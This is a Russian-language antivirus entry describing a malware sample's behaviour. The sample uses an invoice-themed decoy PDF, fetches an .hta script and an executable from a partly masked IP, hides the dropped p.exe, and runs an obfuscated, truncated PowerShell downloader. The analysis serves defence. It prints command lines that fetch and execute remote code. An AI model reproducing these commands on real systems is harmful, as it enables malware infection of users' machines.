Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://13.##9.119.69/O.hta
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\July-2022-Invoice-from-Dennis_2.pdf"
- '%APPDATA%\p.exe'
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\july-2022-invoice-from-dennis_2.pdf
- %APPDATA%\p.exe
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\p.exe
Сетевая активность
Подключается к
- '13.##9.119.69':80
TCP
Запросы HTTP GET
- http://13.##9.119.69/O.hta
- http://13.##9.119.69/July-2022-Invoice-from-Dennis_2.pdf
- http://13.##9.119.69/P.exe
UDP
- DNS ASK rn####in-china.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function siyvBLrnj($naJocycEMQWkQ, $zhxNQiTFEGRWCc){[IO.File]::WriteAllBytes($naJocycEMQWkQ, $zhxNQiTFEGRWCc)};function ApaSZDBnYgSi($naJocycEMQWkQ){if($naJocycEMQ...' (со скрытым окном)
